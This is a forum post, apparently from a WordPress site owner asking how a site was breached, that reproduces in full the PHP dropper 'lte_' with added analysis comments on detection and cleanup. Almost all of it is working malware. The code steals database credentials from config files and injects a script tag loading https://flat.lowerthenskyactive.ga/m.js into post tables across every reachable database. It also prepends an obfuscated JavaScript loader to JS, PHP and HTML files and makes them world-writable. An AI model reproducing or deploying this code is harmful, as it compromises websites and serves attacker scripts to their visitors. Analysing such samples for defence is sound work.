  • Как найти место взлома wordpress?

    @jahtaka
    Там каким-то образом кладётся файлик "lte_", я пока не определил способ его размещения на сервере. Из него начинает постить код в PHP, JS, HTM файлы и в базу с редиректом. Тысячами.

    Ai-bolit всё это находит, благодаря ему как раз и обнаружил.

    Файл "lte_" :
    <?php echo "ssqqss>>>"; // [analysis] fixed marker printed before anything else; this literal is a useful grep key in web logs / captured responses when hunting for this dropper
    // [analysis] every warning raised below (failed scandir/realpath/file writes) is silenced, so the run leaves no PHP error-log trail
    error_reporting(0);
    ini_set('display_errors',0);
    
    
    // [analysis] the only call this sample makes: start at DOCUMENT_ROOT, climb eight parent levels (as far as the
    // process may traverse — on shared hosting that can reach neighbouring accounts) and hand every file whose name
    // contains ".js" to make_it_js(). search_file(), search_file_index() and search_file_ms() are defined further
    // down but are never invoked here; presumably other variants of the same dropper call them.
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
    die(); // [analysis] execution ends here; the definitions that follow are only declarations in this variant
    
      
    /**
     * [analysis] Regex helper used by show_sitenames() to pull a value out of a config file.
     * Wraps $pat in "/.../is" (case-insensitive, dot matches newline), runs preg_match_all
     * over $text and returns the first capture group of the first match, or "" when the
     * pattern does not match. $pat is not preg_quote()d, so callers pass literal regex
     * fragments (the 'DB_*' patterns below).
     */
    function get_var_reg($pat,$text) {
    	
    	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
    	{
    		return $matches[1][0]; // group 1 of the first match; $c (match count) is otherwise unused
    	}
    		
    	return "";
    }
    /**
     * [analysis] Recursive directory walk feeding the database-injection stage.
     * Every non-directory entry whose name contains $file_to_search is passed to
     * show_sitenames(), which harvests DB credentials from it and injects into the
     * database. Not invoked by this sample (see the top-level call), only declared.
     * Symlinks are followed because each entry goes through realpath(), so the walk
     * is not confined to the starting tree.
     */
    function search_file_ms($dir,$file_to_search){
    
    $search_array = array(); // unused leftover
    
    $files = scandir($dir); // not @-suppressed here; whether a warning is logged depends on the caller's error_reporting
    
    if($files == false) {
    	
    	// [analysis] on an unreadable path, drop the last three characters (one "../" segment) and retry,
    	// as long as the shortened path still contains "../" or is exactly DOCUMENT_ROOT."/".
    	// If neither holds, control falls through to the foreach over `false` (no iterations, one warning).
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value); // resolves symlinks
    
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false) { // substring match on the entry name, no extension check
    		
    			show_sitenames($path);
    			
    			
    			
            }
    
        } else if($value != "." && $value != "..") {
    
            @search_file_ms($path, $file_to_search); // unbounded recursion; only "." and ".." are excluded
    
        }  
     } 
    }
    /**
     * [analysis] Credential harvest followed by stored injection into the database.
     * Reads $file; if it mentions DB_NAME, extracts DB_NAME/DB_HOST/DB_USER/DB_PASSWORD
     * from define()-style lines (the layout of wp-config.php), connects with mysqli,
     * enumerates every table in every schema whose name contains "post" via
     * information_schema.TABLES, samples the first post_content, and when that sample
     * lacks the domain appends a <script> tag to every row of the table that does not
     * already carry it. Prints "sql:<schema>.<table>" per touched table.
     * Cleanup implications for the victim: every schema reachable with the harvested
     * credentials — not only the site that owned $file — can hold the tag, so search
     * post_content across all databases, and treat the DB credentials as compromised.
     */
    function show_sitenames($file){
    	$content = @file_get_contents($file);
    	if(strpos($content, "DB_NAME") !== false) {
    	
    	
    	$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content); // extracted but never used: no database is selected, tables are addressed as schema.table
    	$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
    
    
    // Create connection
    $conn = new mysqli($host, $user, $pass);
    
    // Check connection
    if ($conn->connect_error) {
     // [analysis] silent on failure: nothing is logged or printed
    } else { 
    
    
    // [analysis] cross-schema enumeration: any table named like "%post%" in any database the user can see
    $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
    $result = $conn->query($q);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
    		$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 "; // one-row sample decides whether the whole table gets touched
    	$result2 = $conn->query($q2);
    	if ($result2->num_rows > 0) {
    		while($row2 = $result2->fetch_assoc()) {
    			$val = $row2['post_content'];
    			if(strpos($val, "flat.lowerthenskyactive.ga") === false){
    				if(strpos($val, "flat.lowerthenskyactive.ga") === false){ // duplicate of the check just above; no extra effect
    					
    				
    					// [analysis] table-wide UPDATE: appends the tag to every row, the NOT LIKE clause prevents double-tagging per row
    					$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://flat.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%flat.lowerthenskyactive.ga%'";
    					$conn->query($q3);
    					echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
    				
    				} else {
    				
    				}
    
    			} 
    		}
    	} else {
    	}
        }
    } else {
    }
    $conn->close();
    }
    }
    }
    
    /**
     * [analysis] Recursive walk for the HTML/PHP injection stage (same skeleton as
     * search_file_ms). A non-directory entry is handed to make_it() when its name
     * contains $file_to_search and also ".ph" (so .php, .phtml, .php5 …) or ".htm".
     * Because the `!== false` on the second test sits outside the parentheses, that
     * test is the truthiness of strpos(): an entry whose name *starts* with ".htm"
     * (offset 0) is skipped. Not invoked by this sample, only declared.
     */
    function search_file($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	// [analysis] unreadable path: strip one "../" segment and retry while the path still contains "../"
    	// or equals DOCUMENT_ROOT."/"; otherwise fall through to the foreach over `false` (no iterations)
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value); // resolves symlinks, so the walk can leave the starting tree
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file($path, $file_to_search); // unbounded recursion; only "." and ".." excluded
    
        }  
     } 
    
    }
    
    /**
     * [analysis] Identical walk to search_file(), but matching entries go to
     * make_it_index() (plain <script> tag prepended at byte 0) instead of make_it().
     * Same name filter and the same parenthesisation quirk: ".ph" anywhere in the
     * name, or ".htm" at an offset greater than zero. Not invoked by this sample.
     */
    function search_file_index($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	// [analysis] unreadable path: strip one "../" segment and retry while the path still contains "../"
    	// or equals DOCUMENT_ROOT."/"; otherwise fall through to the foreach over `false` (no iterations)
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		search_file_index( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		search_file_index( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value); // resolves symlinks
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it_index($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_index($path, $file_to_search); // unbounded recursion; only "." and ".." excluded
    
        }  
     } 
    
    }
<doc_update>
    /**
     * [analysis] The walk actually executed by this sample (called from the top of the
     * file with DOCUMENT_ROOT climbed eight levels and ".js"). Every non-directory
     * entry whose name contains $file_to_search and ".js" is passed to make_it_js().
     * The ".js" test is a substring test, so names such as "*.json" qualify as well.
     */
    function search_file_js($dir,$file_to_search){
    
    $files = @scandir($dir);
    if($files == false) {
    	
    	// [analysis] unreadable path: strip one "../" segment and retry while the path still contains "../"
    	// or equals DOCUMENT_ROOT."/"; otherwise fall through to the foreach over `false` (no iterations)
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_js( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_js( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value); // resolves symlinks, so the walk can leave the starting tree
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
    
    		make_it_js($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_js($path, $file_to_search); // unbounded recursion; only "." and ".." excluded
    
        }  
     } 
    
    }
    
    /**
     * [analysis] JavaScript file infector. Skips the file if it already contains the
     * numeric sequence below (String.fromCharCode encoding of "flat.lowerthenskyactive.ga");
     * otherwise prepends loader $l2, makes the file world-writable through a shell
     * `chmod 777`, overwrites it and prints "js:<path>". The loader builds a <script>
     * element whose src decodes to https://flat.lowerthenskyactive.ga/m.js and inserts
     * it after the first <script>, after <head>, and as a child of <head>; every string
     * is char-code encoded so the domain never appears in clear text.
     * Detection/cleanup: search .js files for the numeric sequence or for
     * "Element.prototype.appendAfter", and list files left with mode 777 — that
     * permission change is a durable side effect of this routine.
     */
    function make_it_js($f){
    			$g = file_get_contents($f);
    			
    										
    
    if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {
    // already infected: no-op
    } else {
    
    $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
    $g = file_get_contents($f); // redundant second read of the same file
    $g = $l2.$g; // loader goes at byte 0, ahead of any existing content
    @system('chmod 777 '.$f); // spawns a shell; leaves the file world-writable permanently
    @file_put_contents($f,$g);
    echo "js:".$f."\r\n";
    }
    
    			
    }
    /**
     * [analysis] HTML/PHP infector, "prepend" flavour. Skips the file if it contains
     * either the char-code form or the plain domain; otherwise places a literal
     * <script src='https://flat.lowerthenskyactive.ga/m.js?n=nb5'> tag at byte 0 of
     * the file (ahead of any <?php or <!DOCTYPE>), chmods it to 777 via a shell,
     * overwrites it and prints "in:<path>". The "?n=nb5" query value differs from the
     * "?n=ns1" used for database rows, presumably a per-vector tag for the operator.
     * Detection: grep for the domain; list files left with mode 777.
     */
    function make_it_index($f){
    $g = file_get_contents($f);
    if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false || strpos($g, 'flat.lowerthenskyactive.ga') !== false) {
    // already infected (either encoding): no-op
    } else {
    $l2 = "<script type='text/javascript' src='https://flat.lowerthenskyactive.ga/m.js?n=nb5'></script>";
    $g = file_get_contents($f); // redundant second read
    $g = $l2.$g; // tag placed at byte 0, no attempt to find <head>
    
    @system('chmod 777 '.$f); // spawns a shell; file stays world-writable afterwards
    @file_put_contents($f,$g);
    echo "in:".$f."\r\n";
    
    
    			}
    }
    
    /**
     * [analysis] HTML/PHP infector, "inside <head>" flavour. Skips the file only when the
     * char-code sequence is present (the plain domain is not checked). Otherwise builds
     * an inline <script> carrying the same String.fromCharCode loader as make_it_js() and
     * writes it once after "<head>" and once before "</head>". Both replacements start
     * from the untouched $g, so when a file contains both tags the second
     * file_put_contents() overwrites the first result and only the "</head>" insertion
     * survives. Each write is preceded by a shell `chmod 777` and followed by "hh:<path>"
     * on stdout. Detection: grep for "Element.prototype.appendAfter" or the numeric
     * sequence near <head>; list files left with mode 777.
     */
    function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {
    // already infected: no-op
    } else {
    $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
    if (strpos($g, '<head>') !== false) {
    $b = str_replace("<head>","<head>".$l2,$g); // every "<head>" occurrence, derived from the original $g
    @system('chmod 777 '.$f); // spawns a shell; file stays world-writable afterwards
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    if (strpos($g, '</head>') !== false) {
    $b = str_replace("</head>",$l2."</head>",$g); // also from the original $g, so this write discards the "<head>" insertion above
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    
    
    			}
    }